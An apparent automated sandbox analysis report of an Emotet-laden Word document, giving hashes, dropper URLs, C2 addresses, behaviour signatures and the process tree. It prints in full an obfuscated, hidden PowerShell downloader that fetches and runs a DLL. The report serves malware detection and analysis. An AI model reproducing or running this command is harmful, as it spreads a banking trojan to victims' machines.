Analysis

  • max time kernel
    136s
  • max time network
    132s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    14-01-2021 01:54

General

  • Target

    List Q955.doc

  • Size

    198KB

  • MD5

    ec2fc480d23d8803fc4e8723fc0e4ab3

  • SHA1

    e14b802c44f55ad89024794683d5d828c0391687

  • SHA256

    b9aef94645ea110b4b94785205f26193c5626c9f73be4343db07594ab35e9816

  • SHA512

    49eb92ee53f13beafd56a1d7da181af5882fa86adab27c08a8f6b58689e4345e81cac9c589a14875b1e048b556e2cc41b1e4a60127bacacc0af3f1abceb0219e

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://geisterhouse.com/cgi-bin/aJsk/

exe.dropper

http://degepro.com/eTrac/6XRo0/

exe.dropper

http://jespersen.org/carter/STvOz4/

exe.dropper

http://datawyse.net/MW7rFF/

exe.dropper

https://suhu.site/wp-admin/pm/

exe.dropper

http://wildtrust.mediadevstaging.com/wp-content/N/

exe.dropper

http://9jacology.com/dragon-quest-cxpij/2/

Extracted

Family

emotet

Botnet

Epoch1

C2

108.4.209.15:80

187.39.237.56:8080

167.71.148.58:443

211.215.18.93:8080

1.234.65.61:80

81.215.230.173:443

70.32.84.74:8080

212.71.237.140:8080

104.131.41.185:8080

138.97.60.140:8080

187.162.250.23:443

24.232.228.233:80

177.144.130.105:443

105.209.235.113:8080

202.134.4.210:7080

149.202.72.142:7080

200.24.255.23:80

217.13.106.14:8080

192.232.229.54:7080

46.105.114.137:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\List Q955.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4760
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IABzAGUAVAAgACAANgAzAHEAZAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAxAH0AewAzAH0AewAyAH0AIgAgAC0AZgAgACcAcwAnACwAJwBEAGkAUgBlACcALAAnAHIAeQAnACwAJwBjAHQATwAnACwAJwBZAFMAVABlAE0ALgBJAE8ALgAnACkAIAAgACkAOwAgACAAJABnAFUAMAAgAD0AWwB0AFkAcABFAF0AKAAiAHsANQB9AHsANAB9AHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9AHsANgB9AHsANwB9ACIAIAAtAGYAJwBSACcALAAnAEMARQAnACwAJwB2AGkAJwAsACcAcAAnACwAJwB0AGUATQAuAG4AZQB0AC4AUwBlACcALAAnAHMAeQBzACcALAAnAE8ASQBuAFQATQAnACwAJwBhAE4AYQBHAGUAcgAnACkAIAA7ACAAJABFADkANQBpAG0AeABqAD0AKAAoACcATQBzACcAKwAnAGQAegA4ADkAJwApACsAJwB1ACcAKQA7ACQAWQBlAGQAMwBrADYAbQA9ACQAWgBmAGcAeAAyADAAeQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQATgBqAG0AYwBxADkAMQA7ACQARgA2AHcAbgBhAGQAXwA9ACgAKAAnAEQAOAAnACsAJwBuACcAKQArACgAJwBpAGkAYwAnACsAJwB0ACcAKQApADsAIAAgACQANgAzAFEAZAA6ADoAIgBDAGAAUgBlAEEAYABUAEUARABpAFIAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQAnACsAKAAnAEEAJwArACcAbwBwADYAJwArACcAMQBsACcAKQArACcAMwB7ACcAKwAnADAAfQBQADQAJwArACcAdQBzAGMAXwA4AHsAMAB9ACcAKQAgACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQARgBhAHMAOQA1AGoAcgA9ACgAJwBHAHQAJwArACgAJwAyAGQAawBoACcAKwAnAGMAJwApACkAOwAgACAAJABnAFUAMAA6ADoAIgBzAGUAQwB1AHIAYABpAGAAVAB5AFAAcgBgAE8AdABgAG8AYwBvAEwAIgAgAD0AIAAoACgAJwBUAGwAcwAnACsAJwAxACcAKQArACcAMgAnACkAOwAkAFUAZgByAGIAbQBoAHQAPQAoACgAJwBEACcAKwAnADMAdAAnACkAKwAoACcANgB2AHEAJwArACcAYwAnACkAKQA7ACQAUABqAHoAOQA2AF8AcQAgAD0AIAAoACcAVAAnACsAKAAnAHoANQAnACsAJwBwACcAKQArACgAJwBxADMAJwArACcAZQAnACkAKQA7ACQASwBvAGUAcgBuADgAZAA9ACgAKAAnAFcANAAnACsAJwBwACcAKQArACgAJwBjAHYAJwArACcAcgBsACcAKQApADsAJABOAHYANABiADEAeAB4AD0AKAAoACcATQBrACcAKwAnAG0AJwApACsAKAAnAHYAJwArACcAbwB5AGQAJwApACkAOwAkAEoAbQByAGcAYgBnADUAPQAkAEgATwBNAEUAKwAoACgAKAAnAGwAJwArACcAWgBrACcAKQArACcAQQAnACsAKAAnAG8AcAA2ADEAbAAnACsAJwAzACcAKwAnAGwAWgAnACkAKwAoACcAawAnACsAJwBQADQAdQAnACkAKwAnAHMAYwAnACsAKAAnAF8AOABsACcAKwAnAFoAawAnACkAKQAtAGMAcgBlAHAATABhAEMAZQAoACcAbAAnACsAJwBaAGsAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAagB6ADkANgBfAHEAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABCAHQAeQAwAGQAYgB1AD0AKAAoACcAUgAnACsAJwB3AF8AJwApACsAJwAzACcAKwAoACcAYQAnACsAJwBfADYAJwApACkAOwAkAEsAbAB4ADkANQB1AGcAPQBOAGUAdwAtAGAATwBiAEoAZQBgAGMAVAAgAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBuAHQAOwAkAEsAXwBsAHEAcwBhAHUAPQAoACgAKAAoACcAaAB0AHQAJwArACcAcAA6AEoAKQAnACkAKQArACcAKAAnACsAKAAoACcAMwBzADIAKQAoAEoAKQAnACsAJwAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoAGcAJwApACkAKwAnAGUAaQAnACsAJwBzACcAKwAoACcAdAAnACsAJwBlAHIAJwApACsAKAAnAGgAJwArACcAbwB1AHMAZQAuACcAKQArACgAJwBjACcAKwAnAG8AbQBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACcAKwAnACgAJwArACcAYwAnACkAKQArACcAZwBpACcAKwAoACgAJwAtAGIAJwArACcAaQBuAEoAKQAnACkAKQArACcAKAAnACsAKAAoACcAMwAnACsAJwBzADIAKQAoACcAKQApACsAKAAoACcAYQBKAHMAawBKACkAJwArACcAKAAzACcAKQApACsAKAAoACcAcwAyACcAKwAnACkAJwApACkAKwAoACgAJwAoACcAKwAnAEAAaAAnACkAKQArACgAKAAnAHQAJwArACcAdABwACcAKwAnADoASgApACgAMwBzADIAKQAnACsAJwAoACcAKwAnAEoAKQAnACkAKQArACcAKAAnACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBkACcAKwAoACcAZQBnAGUAJwArACcAcAByACcAKwAnAG8AJwApACsAKAAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAoACcASgApACcAKQApACsAKAAoACcAKAAzACcAKQApACsAKAAoACcAcwAyACkAJwArACcAKABlACcAKwAnAFQAcgAnACkAKQArACgAKAAnAGEAJwArACcAYwBKACkAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAJwApACkAKwAoACcANgBYACcAKwAnAFIAbwAwACcAKwAnAEoAJwApACsAKAAoACcAKQAoADMAcwAnACsAJwAyACkAKABAACcAKwAnAGgAdAAnACsAJwB0AHAAJwApACkAKwAnADoAJwArACgAKAAnAEoAJwArACcAKQAoADMAJwApACkAKwAoACgAJwBzADIAKQAnACsAJwAoAEoAKQAoADMAJwArACcAcwAnACkAKQArACcAMgAnACsAKAAoACcAKQAoACcAKwAnAGoAJwArACcAZQBzAHAAZQAnACkAKQArACcAcgBzACcAKwAnAGUAJwArACcAbgAuACcAKwAoACgAJwBvAHIAZwBKACkAKAAnACsAJwAzACcAKwAnAHMAMgApACgAJwApACkAKwAoACcAYwAnACsAJwBhAHIAJwApACsAKAAoACcAdABlAHIASgApACcAKwAnACgAMwBzACcAKwAnADIAJwArACcAKQAoAFMAJwArACcAVAB2AE8AegAnACkAKQArACcANABKACcAKwAnACkAJwArACgAJwAoADMAcwAyACcAKwAnACkAJwApACsAKAAoACcAKABAACcAKQApACsAKAAnAGgAJwArACcAdAB0AHAAOgAnACkAKwAoACgAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKABKACcAKQApACsAKAAoACcAKQAoADMAJwArACcAcwAyACcAKwAnACkAKABkAGEAdAAnACkAKQArACgAJwBhACcAKwAnAHcAeQBzAGUAJwArACcALgBuACcAKQArACcAZQB0ACcAKwAoACgAJwBKACkAJwArACcAKAAzACcAKwAnAHMAMgApACgATQAnACkAKQArACcAVwA3ACcAKwAnAHIAJwArACcARgAnACsAKAAoACcARgBKACkAJwArACcAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwArACcAdAAnACsAJwB0AHAAJwArACcAcwA6AEoAKQAnACsAJwAoADMAcwAyACkAKABKACcAKwAnACkAJwArACcAKAAzACcAKQApACsAKAAoACcAcwAyACkAKAAnACsAJwBzAHUAJwArACcAaAB1AC4AcwBpAHQAZQBKACcAKwAnACkAJwArACcAKAAzACcAKwAnAHMAMgApACgAdwBwACcAKwAnAC0AYQBkAG0AaQAnACkAKQArACgAKAAnAG4ASgApACcAKwAnACgAJwApACkAKwAoACgAJwAzACcAKwAnAHMAMgAnACsAJwApACgAcABtAEoAKQAoADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoAEAAaAAnACsAJwB0ACcAKQApACsAKAAoACcAdABwADoASgAnACsAJwApACcAKQApACsAKAAoACcAKAAzACcAKwAnAHMAJwApACkAKwAoACgAJwAyACkAJwArACcAKABKACkAKAAnACsAJwAzAHMAJwApACkAKwAoACgAJwAyACkAKAB3ACcAKwAnAGkAJwArACcAbABkACcAKwAnAHQAcgB1AHMAdAAnACkAKQArACgAJwAuAG0AZQBkAGkAYQAnACsAJwBkAGUAdgBzACcAKwAnAHQAYQAnACsAJwBnAGkAbgAnACsAJwBnAC4AYwAnACsAJwBvAG0ASgAnACkAKwAoACgAJwApACgAMwAnACsAJwBzADIAKQAnACsAJwAoAHcAJwApACkAKwAoACcAcAAtAGMAbwBuACcAKwAnAHQAJwArACcAZQAnACkAKwAoACgAJwBuAHQAJwArACcASgApACgAMwAnACsAJwBzADIAKQAnACkAKQArACgAJwAoACcAKwAnAE4ASgApACcAKQArACgAKAAnACgAMwAnACkAKQArACgAKAAnAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACsAJwBwADoASgApACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAJwAoACcAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgApACgAOQBqAGEAJwArACcAYwBvAGwAJwArACcAbwBnAHkALgAnACkAKQArACgAKAAnAGMAbwBtAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoAGQAJwArACcAcgAnACsAJwBhAGcAJwApACkAKwAnAG8AbgAnACsAJwAtACcAKwAoACcAcQAnACsAJwB1AGUAJwApACsAJwBzAHQAJwArACcALQBjACcAKwAoACgAJwB4AHAAJwArACcAaQBqAEoAKQAoADMAJwArACcAcwAnACsAJwAyACkAJwArACcAKAAyAEoAKQAoADMAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoACcAKQApACkAKQAuACIAUgBlAHAAYABsAGAAQQBDAGUAIgAoACgAKAAnAEoAJwArACgAKAAnACkAKAAzAHMAMgAnACsAJwApACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABKADQAOAA2AF8AYwBpACAAKwAgACQAWQBlAGQAMwBrADYAbQAgACsAIAAkAFQAbABfAGMAdgB0AHQAKQA7ACQAUwBwAGEAYwA1AG4AOQA9ACgAKAAnAEIAdABuAGUAJwArACcAeAA2ACcAKQArACcAMwAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AOQBrAGEANABfADEAIABpAG4AIAAkAEsAXwBsAHEAcwBhAHUAIAB8ACAAUwBPAHIAVAAtAGAAbwBiAGAASgBFAGAAQwB0ACAAewBHAGAARQB0AC0AcgBhAGAATgBkAE8AbQB9ACkAewB0AHIAeQB7ACQASwBsAHgAOQA1AHUAZwAuACIAZABgAG8AYABXAG4ATABvAEEARABmAEkAYABMAEUAIgAoACQATQA5AGsAYQA0AF8AMQAsACAAJABKAG0AcgBnAGIAZwA1ACkAOwAkAEwAYwBoAHYAMgBqAGEAPQAoACgAJwBIADgAaAAnACsAJwAzACcAKQArACcAYgAnACsAJwBzAHkAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEoAbQByAGcAYgBnADUAKQAuACIATABlAGAATgBHAHQASAAiACAALQBnAGUAIAAzADMAMAA0ADcAKQAgAHsALgAoACcAcgB1AG4AJwArACcAZABsAGwAMwAnACsAJwAyACcAKQAgACQASgBtAHIAZwBiAGcANQAsACcAIwAxACcALgAiAFQAYABPAFMAdABgAFIASQBOAEcAIgAoACkAOwAkAFUAYwB3ADAANABxAGIAPQAoACgAJwBLADUAcQAnACsAJwB6AGUAZQAnACkAKwAnADgAJwApADsAYgByAGUAYQBrADsAJABOAHgAcwBsADAAcQBxAD0AKAAnAEIAJwArACgAJwAzADkAJwArACcAZgBnAHEAJwArACcAdQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARgBiADcAMwBmAHQAeAA9ACgAJwBFACcAKwAoACcAMQBtACcAKwAnAHEAdgBsACcAKQArACcAZwAnACkA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:3164
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:3104
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD IABzAGUAVAAgACAANgAzAHEAZAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAxAH0AewAzAH0AewAyAH0AIgAgAC0AZgAgACcAcwAnACwAJwBEAGkAUgBlACcALAAnAHIAeQAnACwAJwBjAHQATwAnACwAJwBZAFMAVABlAE0ALgBJAE8ALgAnACkAIAAgACkAOwAgACAAJABnAFUAMAAgAD0AWwB0AFkAcABFAF0AKAAiAHsANQB9AHsANAB9AHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9AHsANgB9AHsANwB9ACIAIAAtAGYAJwBSACcALAAnAEMARQAnACwAJwB2AGkAJwAsACcAcAAnACwAJwB0AGUATQAuAG4AZQB0AC4AUwBlACcALAAnAHMAeQBzACcALAAnAE8ASQBuAFQATQAnACwAJwBhAE4AYQBHAGUAcgAnACkAIAA7ACAAJABFADkANQBpAG0AeABqAD0AKAAoACcATQBzACcAKwAnAGQAegA4ADkAJwApACsAJwB1ACcAKQA7ACQAWQBlAGQAMwBrADYAbQA9ACQAWgBmAGcAeAAyADAAeQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQATgBqAG0AYwBxADkAMQA7ACQARgA2AHcAbgBhAGQAXwA9ACgAKAAnAEQAOAAnACsAJwBuACcAKQArACgAJwBpAGkAYwAnACsAJwB0ACcAKQApADsAIAAgACQANgAzAFEAZAA6ADoAIgBDAGAAUgBlAEEAYABUAEUARABpAFIAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQAnACsAKAAnAEEAJwArACcAbwBwADYAJwArACcAMQBsACcAKQArACcAMwB7ACcAKwAnADAAfQBQADQAJwArACcAdQBzAGMAXwA4AHsAMAB9ACcAKQAgACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQARgBhAHMAOQA1AGoAcgA9ACgAJwBHAHQAJwArACgAJwAyAGQAawBoACcAKwAnAGMAJwApACkAOwAgACAAJABnAFUAMAA6ADoAIgBzAGUAQwB1AHIAYABpAGAAVAB5AFAAcgBgAE8AdABgAG8AYwBvAEwAIgAgAD0AIAAoACgAJwBUAGwAcwAnACsAJwAxACcAKQArACcAMgAnACkAOwAkAFUAZgByAGIAbQBoAHQAPQAoACgAJwBEACcAKwAnADMAdAAnACkAKwAoACcANgB2AHEAJwArACcAYwAnACkAKQA7ACQAUABqAHoAOQA2AF8AcQAgAD0AIAAoACcAVAAnACsAKAAnAHoANQAnACsAJwBwACcAKQArACgAJwBxADMAJwArACcAZQAnACkAKQA7ACQASwBvAGUAcgBuADgAZAA9ACgAKAAnAFcANAAnACsAJwBwACcAKQArACgAJwBjAHYAJwArACcAcgBsACcAKQApADsAJABOAHYANABiADEAeAB4AD0AKAAoACcATQBrACcAKwAnAG0AJwApACsAKAAnAHYAJwArACcAbwB5AGQAJwApACkAOwAkAEoAbQByAGcAYgBnADUAPQAkAEgATwBNAEUAKwAoACgAKAAnAGwAJwArACcAWgBrACcAKQArACcAQQAnACsAKAAnAG8AcAA2ADEAbAAnACsAJwAzACcAKwAnAGwAWgAnACkAKwAoACcAawAnACsAJwBQADQAdQAnACkAKwAnAHMAYwAnACsAKAAnAF8AOABsACcAKwAnAFoAawAnACkAKQAtAGMAcgBlAHAATABhAEMAZQAoACcAbAAnACsAJwBaAGsAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAagB6ADkANgBfAHEAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABCAHQAeQAwAGQAYgB1AD0AKAAoACcAUgAnACsAJwB3AF8AJwApACsAJwAzACcAKwAoACcAYQAnACsAJwBfADYAJwApACkAOwAkAEsAbAB4ADkANQB1AGcAPQBOAGUAdwAtAGAATwBiAEoAZQBgAGMAVAAgAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBuAHQAOwAkAEsAXwBsAHEAcwBhAHUAPQAoACgAKAAoACcAaAB0AHQAJwArACcAcAA6AEoAKQAnACkAKQArACcAKAAnACsAKAAoACcAMwBzADIAKQAoAEoAKQAnACsAJwAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoAGcAJwApACkAKwAnAGUAaQAnACsAJwBzACcAKwAoACcAdAAnACsAJwBlAHIAJwApACsAKAAnAGgAJwArACcAbwB1AHMAZQAuACcAKQArACgAJwBjACcAKwAnAG8AbQBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACcAKwAnACgAJwArACcAYwAnACkAKQArACcAZwBpACcAKwAoACgAJwAtAGIAJwArACcAaQBuAEoAKQAnACkAKQArACcAKAAnACsAKAAoACcAMwAnACsAJwBzADIAKQAoACcAKQApACsAKAAoACcAYQBKAHMAawBKACkAJwArACcAKAAzACcAKQApACsAKAAoACcAcwAyACcAKwAnACkAJwApACkAKwAoACgAJwAoACcAKwAnAEAAaAAnACkAKQArACgAKAAnAHQAJwArACcAdABwACcAKwAnADoASgApACgAMwBzADIAKQAnACsAJwAoACcAKwAnAEoAKQAnACkAKQArACcAKAAnACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBkACcAKwAoACcAZQBnAGUAJwArACcAcAByACcAKwAnAG8AJwApACsAKAAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAoACcASgApACcAKQApACsAKAAoACcAKAAzACcAKQApACsAKAAoACcAcwAyACkAJwArACcAKABlACcAKwAnAFQAcgAnACkAKQArACgAKAAnAGEAJwArACcAYwBKACkAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAJwApACkAKwAoACcANgBYACcAKwAnAFIAbwAwACcAKwAnAEoAJwApACsAKAAoACcAKQAoADMAcwAnACsAJwAyACkAKABAACcAKwAnAGgAdAAnACsAJwB0AHAAJwApACkAKwAnADoAJwArACgAKAAnAEoAJwArACcAKQAoADMAJwApACkAKwAoACgAJwBzADIAKQAnACsAJwAoAEoAKQAoADMAJwArACcAcwAnACkAKQArACcAMgAnACsAKAAoACcAKQAoACcAKwAnAGoAJwArACcAZQBzAHAAZQAnACkAKQArACcAcgBzACcAKwAnAGUAJwArACcAbgAuACcAKwAoACgAJwBvAHIAZwBKACkAKAAnACsAJwAzACcAKwAnAHMAMgApACgAJwApACkAKwAoACcAYwAnACsAJwBhAHIAJwApACsAKAAoACcAdABlAHIASgApACcAKwAnACgAMwBzACcAKwAnADIAJwArACcAKQAoAFMAJwArACcAVAB2AE8AegAnACkAKQArACcANABKACcAKwAnACkAJwArACgAJwAoADMAcwAyACcAKwAnACkAJwApACsAKAAoACcAKABAACcAKQApACsAKAAnAGgAJwArACcAdAB0AHAAOgAnACkAKwAoACgAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKABKACcAKQApACsAKAAoACcAKQAoADMAJwArACcAcwAyACcAKwAnACkAKABkAGEAdAAnACkAKQArACgAJwBhACcAKwAnAHcAeQBzAGUAJwArACcALgBuACcAKQArACcAZQB0ACcAKwAoACgAJwBKACkAJwArACcAKAAzACcAKwAnAHMAMgApACgATQAnACkAKQArACcAVwA3ACcAKwAnAHIAJwArACcARgAnACsAKAAoACcARgBKACkAJwArACcAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwArACcAdAAnACsAJwB0AHAAJwArACcAcwA6AEoAKQAnACsAJwAoADMAcwAyACkAKABKACcAKwAnACkAJwArACcAKAAzACcAKQApACsAKAAoACcAcwAyACkAKAAnACsAJwBzAHUAJwArACcAaAB1AC4AcwBpAHQAZQBKACcAKwAnACkAJwArACcAKAAzACcAKwAnAHMAMgApACgAdwBwACcAKwAnAC0AYQBkAG0AaQAnACkAKQArACgAKAAnAG4ASgApACcAKwAnACgAJwApACkAKwAoACgAJwAzACcAKwAnAHMAMgAnACsAJwApACgAcABtAEoAKQAoADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoAEAAaAAnACsAJwB0ACcAKQApACsAKAAoACcAdABwADoASgAnACsAJwApACcAKQApACsAKAAoACcAKAAzACcAKwAnAHMAJwApACkAKwAoACgAJwAyACkAJwArACcAKABKACkAKAAnACsAJwAzAHMAJwApACkAKwAoACgAJwAyACkAKAB3ACcAKwAnAGkAJwArACcAbABkACcAKwAnAHQAcgB1AHMAdAAnACkAKQArACgAJwAuAG0AZQBkAGkAYQAnACsAJwBkAGUAdgBzACcAKwAnAHQAYQAnACsAJwBnAGkAbgAnACsAJwBnAC4AYwAnACsAJwBvAG0ASgAnACkAKwAoACgAJwApACgAMwAnACsAJwBzADIAKQAnACsAJwAoAHcAJwApACkAKwAoACcAcAAtAGMAbwBuACcAKwAnAHQAJwArACcAZQAnACkAKwAoACgAJwBuAHQAJwArACcASgApACgAMwAnACsAJwBzADIAKQAnACkAKQArACgAJwAoACcAKwAnAE4ASgApACcAKQArACgAKAAnACgAMwAnACkAKQArACgAKAAnAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACsAJwBwADoASgApACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAJwAoACcAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgApACgAOQBqAGEAJwArACcAYwBvAGwAJwArACcAbwBnAHkALgAnACkAKQArACgAKAAnAGMAbwBtAEoAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAoAGQAJwArACcAcgAnACsAJwBhAGcAJwApACkAKwAnAG8AbgAnACsAJwAtACcAKwAoACcAcQAnACsAJwB1AGUAJwApACsAJwBzAHQAJwArACcALQBjACcAKwAoACgAJwB4AHAAJwArACcAaQBqAEoAKQAoADMAJwArACcAcwAnACsAJwAyACkAJwArACcAKAAyAEoAKQAoADMAcwAnACsAJwAyACcAKQApACsAKAAoACcAKQAoACcAKQApACkAKQAuACIAUgBlAHAAYABsAGAAQQBDAGUAIgAoACgAKAAnAEoAJwArACgAKAAnACkAKAAzAHMAMgAnACsAJwApACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABKADQAOAA2AF8AYwBpACAAKwAgACQAWQBlAGQAMwBrADYAbQAgACsAIAAkAFQAbABfAGMAdgB0AHQAKQA7ACQAUwBwAGEAYwA1AG4AOQA9ACgAKAAnAEIAdABuAGUAJwArACcAeAA2ACcAKQArACcAMwAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AOQBrAGEANABfADEAIABpAG4AIAAkAEsAXwBsAHEAcwBhAHUAIAB8ACAAUwBPAHIAVAAtAGAAbwBiAGAASgBFAGAAQwB0ACAAewBHAGAARQB0AC0AcgBhAGAATgBkAE8AbQB9ACkAewB0AHIAeQB7ACQASwBsAHgAOQA1AHUAZwAuACIAZABgAG8AYABXAG4ATABvAEEARABmAEkAYABMAEUAIgAoACQATQA5AGsAYQA0AF8AMQAsACAAJABKAG0AcgBnAGIAZwA1ACkAOwAkAEwAYwBoAHYAMgBqAGEAPQAoACgAJwBIADgAaAAnACsAJwAzACcAKQArACcAYgAnACsAJwBzAHkAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEoAbQByAGcAYgBnADUAKQAuACIATABlAGAATgBHAHQASAAiACAALQBnAGUAIAAzADMAMAA0ADcAKQAgAHsALgAoACcAcgB1AG4AJwArACcAZABsAGwAMwAnACsAJwAyACcAKQAgACQASgBtAHIAZwBiAGcANQAsACcAIwAxACcALgAiAFQAYABPAFMAdABgAFIASQBOAEcAIgAoACkAOwAkAFUAYwB3ADAANABxAGIAPQAoACgAJwBLADUAcQAnACsAJwB6AGUAZQAnACkAKwAnADgAJwApADsAYgByAGUAYQBrADsAJABOAHgAcwBsADAAcQBxAD0AKAAnAEIAJwArACgAJwAzADkAJwArACcAZgBnAHEAJwArACcAdQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARgBiADcAMwBmAHQAeAA9ACgAJwBFACcAKwAoACcAMQBtACcAKwAnAHEAdgBsACcAKQArACcAZwAnACkA
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3100
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Aop61l3\P4usc_8\Tz5pq3e.dll,#1
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1852
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Aop61l3\P4usc_8\Tz5pq3e.dll,#1
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:2068
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lozk\efgv.ffz",RunDLL
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:2564

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Aop61l3\P4usc_8\Tz5pq3e.dll
      MD5

      931d8dbda7016d6a02163c39f0e16d72

      SHA1

      29aca919a04d2440c47006e84fc65df3b5e5813a

      SHA256

      f3a04a329b20e170ebd965482515d2f71083612c470370d32081542180ebd34c

      SHA512

      28d0a932015bacb7e851f6aeaeecf1935d612a248c66e58c513cdd418b34867bb48a4a22d388a71e28a7b8947d3ae25c4ef0afcbdd1d900a83d2db2456438304

    • \Users\Admin\Aop61l3\P4usc_8\Tz5pq3e.dll
      MD5

      931d8dbda7016d6a02163c39f0e16d72

      SHA1

      29aca919a04d2440c47006e84fc65df3b5e5813a

      SHA256

      f3a04a329b20e170ebd965482515d2f71083612c470370d32081542180ebd34c

      SHA512

      28d0a932015bacb7e851f6aeaeecf1935d612a248c66e58c513cdd418b34867bb48a4a22d388a71e28a7b8947d3ae25c4ef0afcbdd1d900a83d2db2456438304

    • memory/1852-8-0x0000000000000000-mapping.dmp
    • memory/2068-10-0x0000000000000000-mapping.dmp
    • memory/2068-12-0x0000000000750000-0x0000000000772000-memory.dmp
      Filesize

      136KB

    • memory/2564-13-0x0000000000000000-mapping.dmp
